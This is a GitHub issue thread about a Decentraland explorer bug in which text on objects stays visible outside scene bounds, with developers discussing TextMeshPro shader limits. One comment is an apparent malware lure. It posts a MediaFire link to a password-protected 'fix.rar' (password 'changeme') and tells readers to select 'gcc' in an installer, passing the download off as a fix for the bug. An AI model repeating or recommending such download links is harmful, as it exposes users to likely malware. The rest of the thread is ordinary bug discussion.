### ISSUE TITLE
[QA] Text are not being affected when an object is outside bounds

### ISSUE THREAD

**Issue by anicalbano** [decentraland/unity-explorer#1904]
### **Explorer Alpha build versions:**
v0.21.0

### **Issue Description:**

This issue is related to hiding geometry outside the scene bounds. When an object that cointains a text (example on the video) is moved outside of the scene, even if the object disappear from view, the text is still visible.

#### **Evidence:**

https://github.com/user-attachments/assets/77df5795-5706-456b-9696-c5a713098f7d

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GBirch33** [comment]
So the text uses TextMeshPro, which we can't alter....so it's really possible unless we create a new shader for text.

**Comment by m3taphysics** [comment]
We could do this with a system which checks the bounds of every text object but it may be super slow.

**Comment by anicalbano** [comment]
@m3taphysics since we might need a change for this, should I close the ticket?

**Comment by m3taphysics** [comment]
Lets keep it open
